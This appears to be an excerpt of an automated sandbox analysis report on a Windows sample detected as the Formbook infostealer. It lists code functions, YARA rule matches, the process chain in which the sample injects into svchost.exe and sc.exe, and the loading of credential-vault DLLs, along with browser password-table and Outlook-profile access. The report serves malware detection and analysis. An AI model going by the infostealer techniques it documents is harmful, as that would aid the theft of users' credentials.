            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0360739A4_2_0360739A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036612ED4_2_036612ED
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035DB2C04_2_035DB2C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C52A04_2_035C52A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0368B16B4_2_0368B16B
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035AF1724_2_035AF172
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035F516C4_2_035F516C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035CB1B04_2_035CB1B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367F0E04_2_0367F0E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036770E94_2_036770E9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C70C04_2_035C70C0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0366F0CC4_2_0366F0CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367F7B04_2_0367F7B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036056304_2_03605630
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036716CC4_2_036716CC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036775714_2_03677571
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036895C34_2_036895C3
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0365D5B04_2_0365D5B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035B14604_2_035B1460
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367F43F4_2_0367F43F
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367FB764_2_0367FB76
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03635BF04_2_03635BF0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035FDBF94_2_035FDBF9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035DFB804_2_035DFB80
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03633A6C4_2_03633A6C
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03677A464_2_03677A46
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367FA494_2_0367FA49
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0366DAC64_2_0366DAC6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03605AA04_2_03605AA0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03661AA34_2_03661AA3
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0365DAAC4_2_0365DAAC
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C99504_2_035C9950
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035DB9504_2_035DB950
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_036559104_2_03655910
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0362D8004_2_0362D800
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C38E04_2_035C38E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367FF094_2_0367FF09
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03583FD24_2_03583FD2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03583FD54_2_03583FD5
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C1F924_2_035C1F92
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367FFB14_2_0367FFB1
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C9EB04_2_035C9EB0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03677D734_2_03677D73
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035C3D404_2_035C3D40
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03671D5A4_2_03671D5A
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035DFDC04_2_035DFDC0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_03639C324_2_03639C32
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0367FCF24_2_0367FCF2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B819E04_2_02B819E0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B7ABD04_2_02B7ABD0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B7ABC64_2_02B7ABC6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B7CB504_2_02B7CB50
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B7C9304_2_02B7C930
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B7C9274_2_02B7C927
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B832704_2_02B83270
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B850A04_2_02B850A0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B711A24_2_02B711A2
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_02B9B7B04_2_02B9B7B0
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_033DE3544_2_033DE354
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_033DE4934_2_033DE493
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_033DE8354_2_033DE835
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_033DD8984_2_033DD898
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 102 times
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 0362EA12 appears 86 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03607E54 appears 111 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035AB970 appears 280 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 035F5130 appears 58 times
            Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 0363F290 appears 105 times
            Source: foljNJ4bug.exe, 00000000.00000003.2157601447.0000000004A6D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs foljNJ4bug.exe
            Source: foljNJ4bug.exe, 00000000.00000003.2151039892.00000000048C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs foljNJ4bug.exe
            Source: foljNJ4bug.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeFile created: C:\Users\user\AppData\Local\Temp\prophetessesJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCommand line argument: #v0_2_0040D6B0
            Source: foljNJ4bug.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\foljNJ4bug.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sc.exe, 00000004.00000002.4568890860.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4568890860.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4568890860.00000000031AE000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2455789064.000000000318D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2455922069.00000000031AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: foljNJ4bug.exeVirustotal: Detection: 52%
            Source: foljNJ4bug.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\foljNJ4bug.exeFile read: C:\Users\user\Desktop\foljNJ4bug.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\foljNJ4bug.exe "C:\Users\user\Desktop\foljNJ4bug.exe"
            Source: C:\Users\user\Desktop\foljNJ4bug.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\foljNJ4bug.exe"
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\foljNJ4bug.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\foljNJ4bug.exe"Jump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\foljNJ4bug.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: foljNJ4bug.exeStatic file information: File size 1337889 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YKSXcXcWryn.exe, 00000003.00000000.2198124643.000000000034E000.00000002.00000001.01000000.00000005.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2342357294.000000000034E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: foljNJ4bug.exe, 00000000.00000003.2150201716.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, foljNJ4bug.exe, 00000000.00000003.2149834312.0000000004940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2274615489.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185891967.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184329648.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2274615489.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2274285508.000000000322F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2276853767.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.0000000003580000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.000000000371E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdbUGP source: svchost.exe, 00000002.00000003.2242446426.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242408515.000000000341A000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2213398487.000000000062B000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2660649111.0000000000639000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: foljNJ4bug.exe, 00000000.00000003.2150201716.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, foljNJ4bug.exe, 00000000.00000003.2149834312.0000000004940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2274615489.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185891967.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184329648.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2274615489.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000004.00000003.2274285508.000000000322F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000003.2276853767.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.0000000003580000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4570625529.000000000371E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sc.pdb source: svchost.exe, 00000002.00000003.2242446426.000000000343B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242408515.000000000341A000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2213398487.000000000062B000.00000004.00000020.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000003.00000003.2660649111.0000000000639000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sc.exe, 00000004.00000002.4568890860.000000000312E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4571993110.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2343067255.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2565816481.000000000081C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sc.exe, 00000004.00000002.4568890860.000000000312E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000004.00000002.4571993110.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000000.2343067255.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2565816481.000000000081C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: foljNJ4bug.exeStatic PE information: real checksum: 0xa961f should be: 0x1558d1
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041794E push ss; ret 2_2_0041794F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004142D3 push edi; iretd 2_2_004142D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415A83 push esi; retf 2_2_00415AB2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404B5A pushad ; iretd 2_2_00404B5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EB92 push FFFFFFA3h; iretd 2_2_0041EB94
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414405 push eax; ret 2_2_00414412
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406E26 push ebx; ret 2_2_00406E27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401EC3 push 00000025h; ret 2_2_00401F5D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417693 push edi; iretd 2_2_0041769F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BF55 push 8DDE865Dh; iretd 2_2_0040BF62
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F5B push esi; iretd 2_2_00417F76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F10 push eax; ret 2_2_00402F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F23 push 00000025h; ret 2_2_00401F5D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F3B push esi; iretd 2_2_00417F76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F84 push esi; iretd 2_2_00417F76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F9C push esi; iretd 2_2_00417F76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0358225F pushad ; ret 4_2_035827F9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035827FA pushad ; ret 4_2_035827F9
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_035B09AD push ecx; mov dword ptr [esp], ecx4_2_035B09B6
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0358283D push eax; iretd 4_2_03582858
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4_2_0358135E push eax; iretd 4_2_03581369
